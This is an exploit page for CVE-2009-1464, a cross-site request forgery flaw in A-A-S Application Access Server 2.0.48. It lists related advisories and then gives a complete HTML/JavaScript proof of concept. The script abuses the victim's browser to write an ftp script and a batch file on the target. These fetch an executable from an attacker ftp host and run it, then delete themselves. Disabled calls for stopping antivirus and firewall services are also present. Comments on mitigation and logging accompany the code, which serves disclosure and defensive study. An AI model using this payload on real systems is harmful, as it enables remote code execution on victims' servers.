Klinzmann A-A-S 2.0.48 XSRF Exploit

🗓️ 13 May 2009 00:00:00 · Reported by Felipe Daragon · Type
packetstorm
 packetstorm

Demonstration of A-A-S 2.0.48 XSRF vulnerability

NVD
CVE-2009-1464
14 May 200917:30
nvd
Cvelist
CVE-2009-1464
14 May 200917:00
cvelist
CVE
CVE-2009-1464
14 May 200917:30
cve
Prion
Cross site request forgery (csrf)
14 May 200917:30
prion
OpenVAS
A-A-S Application Access Server <= 2.0.48 Multiple Vulnerabilities
12 May 200900:00
openvas
OpenVAS
A-A-S Application Access Server Multiple Vulnerabilities
12 May 200900:00
openvas
OpenVAS
Ubuntu USN-774-1 (moin)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-772-1 (mpfr)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-773-1 (pango1.0)
5 Jun 200900:00
openvas
OpenVAS
Ubuntu USN-771-1 (libmodplug)
5 Jun 200900:00
openvas
`<html>  
<body>  
  
<!--  
****************************************************************  
AASHack 1.0 (By Felipe M. Aragon)  
Affected Versions: AAS 2.0.48 and possibly older versions  
  
This is an exploit demonstration code for the A-A-S (Application  
Access Server) index.aas job parameter XSRF vulnerability  
(CVE-2009-1464)  
  
This script has been successfully tested on IE 7.0 and Firefox  
3.08. Should work on any browser that has javascript enabled  
  
Vulnerability found by Syhunt (http://www.syhunt.com)  
  
This script should be used only by system administrators (or  
other people in charge). Read the text below before making any  
use of this script.  
  
(c) 2009 Syhunt Cyber Security Company. All rights reserved.  
  
This script is provided 'as-is', without any expressed or implied  
warranty. In no event will the author be held liable for  
any damages arising from the use of this script.  
Permission is granted to anyone to use this script, and to alter  
it and redistribute it freely, subject to the following  
restrictions:  
  
1. The origin of this script must not be misrepresented, you  
must not claim that you wrote the original code.  
2. Altered source versions must be plainly marked as such, and  
must not be misrepresented as being the original script.  
3. This notice may not be removed or altered from any source  
distribution.  
  
If you have any questions concerning this license, please email  
contact _at_ syhunt _dot_ com  
****************************************************************  
-->  
  
<script>  
// Javascript is used to force the browser to sequentially load  
// the images that will trigger the server commands.  
  
// Proof-of-concept configuration. Every value below ends up inside the  
// query string of a GET request to the AAS web interface (see writeimg),  
// so from a defender's side the observable pattern is a burst of requests  
// to `/index.aas?job=` on port 6262 from a single browser session, with  
// file names and command text visible in plain web/proxy logs.  
var dd=1000; // default delay time (ms) between consecutive requests  
var aas_url='http://[host]:6262'; // target AAS host ([host] is a placeholder)  
var ftp_host='x.x.x.x'; // attacker ftp host (placeholder)  
var ftp_user='anonymous';  
var ftp_pass='123456';  
var ftp_commands_file='aashack.ftp'; // ftp script built line by line on the target  
var batch_file='aashack.bat'; // batch file built line by line on the target  
var attacker_file='file.exe'; // file the ftp script fetches and the batch file starts  
  
function delay(ms) {  
  // Blocking busy-wait: spins on the clock until `ms` milliseconds have  
  // elapsed. Nothing else on the page runs while it spins; the script  
  // relies on this to space out the image requests it emits.  
  var started = new Date().getTime();  
  while (new Date().getTime() - started < ms) {  
    // keep spinning  
  }  
}  
  
// CSRF primitive. Appends a hidden <img> whose src is a GET request to the  
// AAS web interface; the victim's browser sends it with whatever ambient  
// credentials it holds for that host, so the server performs a state-changing  
// action the victim never intended. The root cause, as the request shape  
// shows, is that `index.aas` accepts commands over a plain GET carrying only  
// `job`, `action` and `select` — no per-session anti-CSRF token and, evidently,  
// no Origin/Referer check. Mitigation on the server side: require a CSRF  
// token, refuse GET for state-changing jobs, and validate the request origin.  
// job:    the AAS job name ('command', 'setservice', 'killprocess' below).  
// action: job-specific argument, URL-encoded with the legacy escape().  
// select: job-specific target (service or process name), likewise encoded.  
function writeimg(job,action,select) {  
var act = escape(action); // legacy escape(); note `job` itself is not encoded  
var sel = escape(select);  
document.write('<img src="'+aas_url+'/index.aas?job='+job+'&action='+act+'&select='+sel+'" style="visibility:hidden;">');  
}  
  
// Main Functions  
// Emits one `job=command` request with `select` left empty, then blocks for  
// dms ms so the next request is not written before this one is sent.  
function Run(action,dms) { writeimg('command',action,''); delay(dms); }  
// Same as Run, but wraps the value in `cmd /C` so the server passes it to  
// the Windows shell. Log entries for this job therefore contain the full  
// shell command line in the `action` parameter.  
function Console(cmdline,dms) { Run('cmd /C '+cmdline,dms); }  
// Appends one line to the ftp script on the target via `echo … >>`. Each call  
// is a separate GET request, spaced by dd ms.  
function AddFTPCmd(cmdline) { Console('echo '+cmdline+'>>'+ftp_commands_file,dd); }  
// Appends one line to the batch file on the target via `echo … >>`, one GET  
// request per line, spaced by dd ms.  
function AddBatchLine(line) { Console('echo '+line+'>>'+batch_file,dd); }  
//function Kill(exename) { Run('taskkill /f /im '+exename,dd); } // alternative way to kill a process  
// Emits `job=setservice&action=stop&select=<servicename>`; a stop request for  
// a named Windows service, again over an unauthenticated-intent GET.  
function StopSvc(servicename) { writeimg('setservice','stop',servicename); delay(dd); }  
// Emits `job=killprocess&select=<exename>` with an empty `action`.  
function KillProcess(exename) { writeimg('killprocess','',exename); delay(dd); }  
  
// No-op as shipped: every StopSvc call inside is commented out. The intended  
// role is to stop protective services before the final command runs; a run  
// of `setservice` stop requests immediately preceding `command` requests  
// from one client is a useful alerting pattern on the AAS side.  
function StopUndesiredServices() {  
//StopSvc("somefirewall");  
//StopSvc("someantivirus");   
//StopSvc("wuauserv"); // Automatic Updates  
}  
  
// No-op as shipped: the single KillProcess call inside is commented out.  
function KillUndesiredProcesses() {  
//KillProcess('firewall.exe');  
}  
  
// Main sequence. Each call below becomes one hidden <img> GET request, so the  
// whole chain is observable server-side as twelve `index.aas?job=command`  
// requests about dd ms apart from one client: six `echo` lines building the  
// ftp script, five building the batch file, then one request that runs the  
// batch file. The two helper calls in between are no-ops as shipped.  
// Because the page builds the files with `echo` rather than uploading them,  
// the complete contents of both files appear in the web server's request  
// log, which is the simplest place to reconstruct what happened.  
AddFTPCmd(ftp_user);  
AddFTPCmd(ftp_pass);  
AddFTPCmd('binary');  
AddFTPCmd('get '+attacker_file);  
AddFTPCmd('close');  
AddFTPCmd('bye');  
AddBatchLine('@echo off');  
AddBatchLine('ftp -is:'+ftp_commands_file+' '+ftp_host);  
AddBatchLine('start '+attacker_file);  
AddBatchLine('del '+ftp_commands_file);  
AddBatchLine('del %0'); // self-destruct  
StopUndesiredServices();  
KillUndesiredProcesses();  
Run(batch_file,dd); // final request: executes the batch file that was just written  
</script>  
  
</body>  
</html>  
  
  
`
